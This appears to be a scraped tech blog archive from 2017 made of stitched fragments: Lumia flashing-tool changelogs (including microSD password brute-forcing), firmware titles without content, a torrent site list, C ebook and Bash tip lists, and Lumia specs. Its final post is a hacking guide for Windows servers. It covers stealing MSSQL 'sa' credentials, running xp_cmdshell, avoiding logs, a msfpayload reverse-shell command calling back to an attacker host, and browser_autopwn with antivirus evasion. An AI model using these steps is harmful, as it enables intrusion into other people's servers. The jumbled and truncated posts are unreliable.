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Thursday, 21 September 2017

ATF Lumia Micro SD BruteForce v8 5 Update!! 28 FEB 2012!!

ATF Lumia Micro SD BruteForce v8 5 Update!! 28 FEB 2012!!


ATF Lumia & Micro SD BruteForce v8.5 Update!! 28 FEB 2012!!
Windows Phone Lumia Flashing Engine Fully Supported

--> FULL FLash Lumia 800, 800.2, 710, 710.1, 610 and other upcoming Windows Phone Devices
--> Firmware Downgrade supported for ALL Lumia Products
--> Partial Flashing Supported for ALL Lumia Products (Skip Mode, Skip WPOS, Skip OSBL etc...)
--> Supports Dead and Alive Phone
--> Can Scan Live Phone
--> Cross-Flashing Supported for Products with the same Roothash (710 <--> 710.1 or 800 <--> 800.2)
--> Boot OSBL via NORMAL MODE Fully Implemented (No need to power off phone)
--> No need to press the VOLUME UP Button for Lumia 710 and Lumia 710.1
Micro SD Card Password Bruteforce Now Implemented
--> Customizable Character Sets Available (small caps only, digits only etc)
--> Supports all Types of micro SD Card from 32MB upto 128GB
--> Customizable Min and Max Length of Password Mask
--> Pause/Resume Supported
--> Automatically Saves RESUME File every 500 Passwords

Micro SD Card Total Erase (Low Level Erase)

--> Supports all Types of micro SD Card from 32MB upto 128GB
Bug Fixes:
1. Fixed GUI Hang when FBUS Simlock Backup Fails at the Start of Flashing.
2. Fixed FBUS Booting when receiving receiving incomplete BB5 Boot Code.
Other Updates:
1. Added Complete New Product Listing Inside Nokia.ini
2. Removed iTablets Legacy Flasher (iTablets and MEego are Now Fully Inside BB5 Tab)
3. Improved BB5 Product Scanning after a Complete Flash
ATF Lumia & Micro SD BruteForce v8.5 Update!! Public Discussion Thread:

ATF Lumia & Micro SD BruteForce v8.5 Update!! Public Discussion Thread:
ATF [Advance Turbo Flasher] official web sites:
International - http://www.advance-box.com/
ATF [Advance Turbo Flasher] official support forums:
World Wide: Advance Turbo Flasher - GSM-Forum
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Philippine: Gsmph
Syria: Arabic Support (Syria) GsmVIP
Chinese support forum : ATF Box
Vietnam: Saigonmobile
India: Advance Box - .:: GsmIndia ::.
Official Iran Support Forum : ASANGSM FORUM
Bangladesh: Advance Box - Dhaka Mobile
Chinese Support forum : www.yananliuhuan.com


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Tuesday, 19 September 2017

Nokia Lumia 610C RM 836 Latest Flash files free download

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Thursday, 14 September 2017

Firmware Nokia Lumia 625 RM 941

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Heres a list of torrent sites, that are probably lesser known but have some great, and sometimes, rare content. 

We all know about the popular torrent sites including Miniova, The Pirate Bay and Torrentz, but what most of us dont know is that there are many more options which are probably lesser known but have some great, and sometimes rare content. 

We have tried to list some of the lesser known torrent sites that can offer you a great dose of content. The criteria of calling them lesser known is their Alexa ratings. All the sites in the list mentioned here are not in the top 5000 most visited sites on the Internet. The order of these websites is random and we have also incorporated some meta search engines as well. 


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Heres the list:

01. extratorrent.com

02. bitenova.nl

03. fenopy.com

04. torrentat.org

05. fulldls.com

06. spynova.org

07. 2torrents.com

08. scrapetorrent.com

09. litebay.org

10. torrents.to

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Firmware Nokia Lumia 625 RM 943

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Here we bring to you 35 free ebooks on one of the most used and most powerful programming languag

C programming is one of the most popular and widely used programming languages for creating computer programs and one major reason behind its popularity is because C gives maximum control and efficiency to the programmer.

It allows the programmer to read and write code for a large number of platforms and everything from micro controllers to the most advanced scientific systems can be written in C, and many modern operating systems are written in C. 
es in the world! 

Also the new object oriented language C++ is an extension of C, and it is nearly impossible to learn C++ without learning C first. So here we bring 35 ebooks for you to learn and enhance skills on C programming. And best of all, they are all free!

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1. Functional C by Pieter Hartel, Henk Muller - Addison-Wesley, 1999

The book teaches how to program in C, assuming that the student has already learnt how to formulate algorithms in a functional style. The student will become a better C programmer, capable of writing programs that are easier to maintain.

2. Programming in C: UNIX System Calls and Subroutines using C by A. D. Marshall - Cardiff University, 1999

This book is guide to UNIX software development in C for professional programmers and students. It focuses on the UNIX system call interface, the programming interface between the UNIX Kernel and applications running in the UNIX environment.

3. A to Z of C by K. Joseph Wesley, R. Rajesh Jeba Anbiah, 2008

This is an intermediate to advanced C programming book writen for C lovers, students, programmers, and other enthusiasts. The book is written to open many secrets of C, it alos introduces various approaches to solve different problems.

4. 88 C Programs by JT Kalnay - Smashwords, 2012

The author included example programs that exhaustively illustrate the important points of C. By working through these programs you can teach yourself C. It is assumed that you already know how to program and are familiar with standard algorithms.

5. Learn C The Hard Way by Zed A. Shaw - LCodeTHW, 2011

A clear and direct introduction to modern C programming. The purpose of this book is to get you strong enough in C that youll be able to write your own software in it, or modify someone elses code. The text is not for beginners.

6. Programming in C by Bharat Kinariwala, Tep Dobry - University of Hawaii at Manoa, 1993

Contents: Designing Programs Top Down; Processing Character Data; Numeric Data Types and Expression Evaluation; Pointers; Arrays; Functions and Files; Two Dimensional Arrays; Sorting and Searching; String Processing; Structures and Unions; etc.

7. Object-Oriented Programming with ANSI-C by Axel-Tobias Schreiner, 1999

In this book, we are going to use ANSI-C to discover how object-oriented programming is done, what its techniques are, why they help us solve bigger problems, and how we harness generality and program to catch mistakes earlier.

8. Conceptive C by Harry McGeough - Smashwords, 2011

Conceptive C is an AI programming Language based on Objective-C and C Language. It is a superset of both languages. Conceptive C uses concepts to program natural language and Artificial Intelligence based computer language based on Objective C.

9. Object-Oriented Programming and the Objective-C Language - NeXT Software, Inc., 1996

Objective-C is implemented as set of extensions to the C language. This book both introduces the object-oriented model that Objective-C is based upon and fully documents the language. It concentrates on the Objective-C extensions to C.

10. C Programming - Wikibooks, 2006

C is the precursor for almost all of the popular high-level languages available today. This book represents a comprehensive look at the C programming language and its features. Basic computer literacy is assumed, but no special knowledge is needed.

11. A Little C Primer - Wikibooks, 2010

This online wiki book is a quick and easy introduction to the ANSI C programming language. It is written by a novice, and is intended for use by a novice. However, it does assume some familiarity with a programming language.

12. Foundations of Computer Science: C Edition by Al Aho, Jeff Ullman - W. H. Freeman, 1994

Aho and Ullman have created a C version of their groundbreaking text. This book combines the theoretical foundations of computing with essential discrete mathematics. It follows the same organizations, with all examples and exercises in C.

13. Become an Xcoder: Start Programming the Mac Using Objective-C by B. Altenberg, A. Clarke, P. Mougin - CocoaLab, 2008

A free book for starting with Cocoa using Objective-C. It teaches you the basics of programming, in particular Objective-C programming, using Xcode. Written for non-programmers, and aimed at leveling the learning curve as much as possible.

14. Objective-C 2.0 Essentials by Neil Smyth - Techotopia, 2010

The Objective-C 2.0 Essentials free online book contains 34 chapters of detailed information intended to provide everything necessary to gain proficiency as an Objective-C programmer for both Mac OS X and iPhone development.

15. Using GCC: The GNU Compiler Collection Reference Manual for GCC by Richard M. Stallman - Free Software Foundation, 2003

The definitive reference manual for the most widely used compiler in the world, written by its current developers. The GNU Compiler Collection is a full-featured ANSI C compiler with support for C, C++, Objective C, Java and Fortran.

16. No Bugs!: Delivering Error-Free Code in C and C++ by David Thielen - Addison-Wesley, 1992

The book offers a revolutionary approach to software development by showing how to write error-free code from the start. Presented are techniques to stop many kinds of bugs from being included in a program. It also discusses how to test programs.

17. Debugging C and C++ code in a Unix environment by J. H. M. Dassen, I. G. Sprinkhuizen-Kuyper � OOPWeb.com

This document describes several techniques and tools for debugging code in C-like languages in a Unix environment. We will also discuss some good coding practices that will diminish the occurrence of certain types of bugs.

18. C Programming in Linux by David Haskins - BookBoon, 2009

Using a series of web development examples, this book will give you an interesting glimpse into a powerful lower-level world. C is tight and spare and economical, and people who know C will ensure critical systems keep running.

19. The GNU C Programming Tutorial by Mark Burgess, Ron Hale-Evans - Free Software Foundation, 2002

This book is a tutorial for the computer programming language C. You should have some basic computer literacy: to be able to run a program, edit a text file, etc. The tutorial introduces basic ideas in a logical order and progresses steadily.

20. The GNU C Library Reference Manual by Sandra Loosemore, at al. - Free Software Foundation, Inc., 2007

The GNU C library, described in this document, defines all of the library functions that are specified by the ISO C standard, as well as additional features specific to POSIX. This manual tells you how to use the facilities of the GNU library.

21. Learning GNU C by Ciaran ORiordan, 2002

The book teaches GNU users how to write software in C. It is written as a tutorial for beginners but should be thorough enough to be used as a reference by experience programmers. The basics are laid down in full in the first few chapters.

22. Learning Cocoa with Objective-C by James Duncan Davidson - OReilly Media, Inc., 2002

This new edition covers the latest updates to the Cocoa frameworks, including examples that use the Address Book and Universal Access APIs. This is the must-have book for people who want to develop applications for Mac OS X.

23. The Objective-C 2.0 Programming Language - Apple Inc., 2009

Objective-C is a small but powerful set of extensions to the standard ANSI C language. This document fully describes the Objective-C language. It concentrates on the Objective-C extensions to C, not on the C language itself.

24. Beejs Guide to Network Programming - Using Internet Sockets by Brian Hall, 2008

A brief how-to guide on network programming using Internet sockets, written for anybody who is just starting out with socket programming. The section on Windows programming is also included. The guide is updated for IPv6.

25. ANSI C for Programmers on UNIX Systems by Tim Love, 1999

This document introduces C by providing and explaining examples of common programming tasks. It enables the reader to learn from available source code by clarifying common causes of incomprehension. Exercises form an integral part of the course.

26. C Programming Tutorial (K&R version 4) by Mark Burgess, 1999

This book is a tutorial. Its aim is to teach C to a beginner, but with enough of the details so as not be outgrown as the years go by. It presumes that you have some previous aquaintance with programming, but you do not need much experience.

27. The C Library Reference Guide by Eric Huss, 1997

This guide provides a useful look at the standard C programming language. It will not teach one how to program in C, nor will it attempt to provide the history of C. It is merely a handy reference to the standard C library.

28. C Language Tutorial by Gordon Dodrill - Applix Pty Ltd, 1999

C language tutorial for experienced programmers. It begins with the highest level of C programming, including the concepts of pointers, structures, and dynamic allocation. This printed version includes copies of all the code, for easier reference.

29. C Elements of Style by Steve Oualline - M & T Books, 1992

A handy guide which covers the principals of good programming style, teaching C and C++ programmers how to write code that can be easily read, understood, and maintained by others. Useful both for students and professional programmers.

30. Writing Bug-Free C Code for Windows by Jerry Jongerius - Prentice Hall, 1995

The book presents a programming style that automatically detects bugs in C code. It describes a technique that results in bug-free code from the beginning, advocating a style of coding based upon data abstraction and run-time object verification.

31. The New C Standard by Derek M. Jones - Addison-Wesley Professional, 2008

The book about the latest version of the C Standard, it is a systematic analysis of the language standard. Every sentence in the C Standard appears in this book, followed by a commentary section, common implementations, coding guidelines, etc.

32. An Introduction to GCC by Brian J. Gough, Richard M. Stallman - Network Theory Ltd, 2004

This manual provides a complete introduction to the GNU C and C++ compilers, common problems and encountered error messages, with numerous easy examples. The text covers compiling using headers and libraries, preprocessor, linking, and more.

33. Image Processing in C: Analyzing and Enhancing Digital Images by Dwayne Philipps - R & D Books, 1997

An image processing tutorial which explains basic concepts, shows results with photographs, and implements programs in C. The book covers filters, edge detectors, and histogram equalizers, print procedures, and I/O routines, which are ready to use.

34. The C Book: Featuring the ANSI C Standard by Mike Banahan, Declan Brady, Mark Doran - Addison-Wesley Pub, 1991

Use this book to produce powerful and portable code. The C Book is dedicated to programmers who have some experience of using a modern high-level procedural programming language. Learn about new standards and how they affect existing C code.

35. Object Oriented Programming in ANSI-C by Axel Schreiner, 2001

We use ANSI-C to find out how to write object oriented programs, what are they useful for solving bigger problems, and how to catch mistakes earlier. The book covers classes, objects, instances, inheritance, linkage, methods, polymorphisms, and more. 


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Sunday, 10 September 2017

Firmware Nokia Lumia 925 RM 910

Firmware Nokia Lumia 925 RM 910


We look at some handy tips that will make your life easy while working on a Linux terminal. 

The Linux terminal has much more to offer than simply typing commands into it. You can master these tricks and become adept at using the Bash shell, which is used as default on majority of Linux distributions. So here are seven tricks that have been outlined below mainly for the less experienced users. 



1. Tab Completion � This helps in saving time and is quite useful if you are unsure about a file or a command�s precise name. For instance, if there is a file with a really lengthy name and you want to delete it, you will need to type the file name escaping the space characters properly i.e you need to (insert the character before each space).

If you type rm r and press Tab, the Bash will instantly fill the file�s name for you. In case of many files beginning with the letter r, Bash will not be able to identify the one you need. 

2. Pipes � This allows you to send the output of a command to a different command. According the UNIX every program is a small utility, which specializes in doing one thing. For instance, the ls command is used to list the files in the current directory and the grep command is used for searching its input for a specific term.

If you combine these with pipes then you can conduct search for a file in the current directory. 
ls | grep word

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3. Wild Cards - The * character (the asterisk) is a wild card that can be used for matching anything. For instance, if you wish to delete both the long file name and we wanted to delete both the �really long file name� and �really very long file name� from the current directory, you can run the command:
rm really*name

4. Output Redirection - The > character can be used to redirect a command�s output to a file in place of another command. For instance, the line below runs the ls command to list the files in the current directory. However, in place of printing that list to the terminal, it prints the list to a file named �file1� in the current directory:
ls > file1

5. Command History � The Bash can recall a history of the commands typed into it. You can make use of the up and down arrow keys for scrolling through the commands that have been used by you recently. The history command prints out a list of these commands to pipe it to grep to search for commands used recently.
~, . & ..

The ~ character called the tilde symbolizes the current user�s home directory. In place of typing cd /home/name for going to home directory, you can type cd ~ instead.

6. Run a Command in the Background � As a standard Bash executes each command that is run by you in the current terminal. It�s okay but what about when you want to launch an application and continue using the terminal. By typing firefox for launching Firefox, this will take over your terminal and show error messages and other output till you close it. By adding the & operator to the end of the command for allowing Bash to execute the program in the background use:
firefox &

7. Conditional Execution � Bash can be used for running two commands in sequence. The second command can only be executed once the first command is completed successfully. For doing this you need to put both commands on the same line and separate it by a &&, or double ampersand.

For instance, the sleep command obtains a value in a matter of a few seconds, counts down, and completes successfully. It�s not useful by itself but can be used for running another command after a delay. The command given below will wait for five seconds and launch the gnome-screenshot tool:
sleep 5 && gnome-screenshot


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Monday, 4 September 2017

Firmware Nokia Lumia 625 RM 943 Bi

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Remember movies like AI, Terminator and I Robot? Want to build such machines of your own? Take these courses, keep at it and you just might get there! 

 Artificial Intelligence is one of the most interesting fields available to any technology oriented mind. This amalgamation of robotics, computer science, electronics and other things, is aimed at building a superior robot (or an organism) that can think and function at par with humans. The subject is not only fascinating, it also includes very advanced technology. Here are 10 online courses that will make learning about AI a little simpler for you. Some of these offer certifications for free too!




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1. Artificial Intelligence

2. Einf�hrung in Computer Vision (Coursera)

3. Discrete Inference and Learning in Artificial Vision (Coursera)

4. Advanced Artificial Intelligence (saylor.org)

5. Machine Learning (Caltech)

6. Introduction to Artificial Intelligence (Udacity)

7. Artificial Intelligence for Robotics (Udacity)

8. Computer Vision: From 3D Reconstruction to Visual Recognition (Early 2013)

9. Artificial Intelligence (saylor.org)

10. CS188.1x: Artificial Intelligence (edX) 

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Saturday, 2 September 2017

Download Infinity Nokia BEST v2 26 Lumia 640 USB Boot Repair fix NaviManager changes

Download Infinity Nokia BEST v2 26 Lumia 640 USB Boot Repair fix NaviManager changes



Infinity Nokia [BEST] v2.26 - Lumia 640 USB Boot Repair fix, NaviManager changes

- Lumia Flash Engine updated

- Boot repair procedure now supported for Lumia 640 line!
FIXED: RM-1062 Lumia 640 XL LTE
FIXED: RM-1066 Lumia 640 XL
FIXED: RM-1067 Lumia 640 XL DualSim
NEW: RM-1074 Lumia 640 LTE
FIXED: RM-1075 Lumia 640 DualSim
FIXED: RM-1077 Lumia 640 DualSim
FIXED: RM-1113 Lumia 640 LTE DualSim

Now you can repair this phones boots easy, fast and over USB.

*Note: LumiaRepairPack_v1.05 must be installed !

- NaviManager updated
Changes in download engine
Link genereation also show links in log ( remember about they have limit lifitime! )
PC Downloader: New MS-notation product code download support
Codes like M10XXXXX-001 (MS-notation) and old 059XXXX (Nokia-notation)

- Other
Some bugfixes and improvements at all























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Monday, 7 August 2017

Microsoft Launched New Lumia Phones

Microsoft Launched New Lumia Phones





Microsoft has announced its two new flagship smartphone running Windows 10 operating system. Lumia 950XL and Lumia 950 are direct competition to the smartphones from leading flagship like Apple,Samsung,Sony and more.



Both smartphones will come with the  Companys own Continuum technology, which allows users to plug their device into a small size cube called the Microsoft display dock.The dock can connect to a computer monitor and used as a Windows PC.

Lumia 950 Specifications:-



  • It scores a 5.2 inch QHD AMOLED display with a pixel density of 564ppi.
  • It is powered by a 1.8GHz hexa-core Qualcomm Snpdragon 808 chipset and 3 GB RAM.
  • 32GB inbuilt storage with to option to expand using a micro sd card upto 200 GB.
  • It has 20 megapixel rear camera with triple-LED RGB flash,4K recording,OIS and a 5megapixel sensor on the front.


Lumia 950XL Specifications:-





  • It scores a 5.7 inch QHD AMOLED display with resoulution of 2560*1440  and pixel density of 518ppi.
  • It has 20 megapixel rear camera with triple-LED RGB flash,4K recording,OIS and a 5megapixel sensor on the front.
  • The smartphone is powered by 64bit octa-core  Qualcomm Snapdragon 810 with 3GB RAM.

    • 32GB inbuilt storage with to option to expand using a micro sd card upto 200 GB.


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    Saturday, 5 August 2017

    Product Codes Microsoft Lumia 435 RM 1069 1068 1070

    Product Codes Microsoft Lumia 435 RM 1069 1068 1070


    Most of us here can hack websites and servers. But what we hate the most is an error message- Access Denied! We know some methods to bypass certain restrictions using the symlink, privilege-escalation using local root exploits and some similar attacks.


    But, these get the job done only on Linux servers. What about windows servers?


    Here are some ways to bypass certain restrictions on windows servers or getting SYSTEM privileges.
    • Using "sa" account to execute commands by MSSQL query via xp_cmdshell stored procedure.
    • Using meterpreter payload to get a reverse shell over the target machine.
    • Using browser_autopwn. (Really...)
    • Using other tools like pwdump7, mimikatz, etc.

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    Using the tools is an easy way, but the real fun of hacking lies in the first three methods I mentioned above.

    1. Using xp_cmdshell- 
    Most of the times on windows servers, we have read permission over the files of other IIS users, which is needed to make this method work.
    If we are lucky enough, we will find login credentials of "sa" account of MSSQL server inside web.config file of any website.
    You must be wondering why only "sa"?
    Here, "sa" stands for Super Administrator and as the name tells, this user has all possible permissions over the server.
    The picture below shows the connection string containing login credentials of "sa" account.

    Hacking Windows Servers

    Using this, we can log into MSSQL server locally (using our web backdoor) & as well as remotely. I would recommend remote access because it does not generate webserver logs which would fill the log file with our web backdoor path.
    So, after getting the "sa" account, we can login remotely using HeidiSQL
    HeidiSQL is an awesome tool to connect to remote database servers. You can download ithere.

    After logging into MSSQL server with sa account, we get a list of databases and their contents.

    Hacking Windows Servers

    Now we can execute commands using MSSQL queries via xp_cmdshell. (With administrator privileges)

    Syntax for the query is-
    xp_cmdshell [command]

    For example, if I need to know my current privileges, I would query-
    xp_cmdshell whoami

    Hacking Windows Servers

    This shows that I am currently NT Authority/System, which most of us know is the highest user in the windows user hierarchy.
    Now we can go for some post exploitation like enabling RDP, adding accounts and allowing them to access RDP.

    Note: If the server does not have xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online.
      
    2. Meterpreter Payload- 
    This method is quite easy and comes useful when we cannot read files of other users, but we can execute commands.
    Using metasploit, generate a reverse shell payload binary.

    For example-
    msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe

    Now we will upload this executable to the server using our web backdoor.
    Run multi/handler auxiliary at our end. (Make sure the ports are forwarded properly)
    Now its time to execute the payload.
    If everything goes right, we will get a meterpreter session over the target machine as shown below-
    We can also use php, asp or other payloads.

    Hacking Windows Servers

    3. Browser Autopwn-
    This seems odd, as a way of hacking a server. But I myself found this as a clever way to do the job, especially in scenarios where we are allowed to execute commands, but we cannot run executables (our payloads) due to software restriction policies in domain environment.
    Most of the windows servers have outdated Internet Explorer and we can exploit them if we can execute commands.
    I think it is clear by now that what Im trying to explain ;)
    We can start Internet Explorer from command line and make it browse to a specific URL.

    Syntax for  this-
    iexplore.exe [URL]

    Where URL would our server address which would be running browser_autopwn. After that we can use railgun to avoid antivirus detection.

    Hacking Windows Servers

    4. Using readily available tools-

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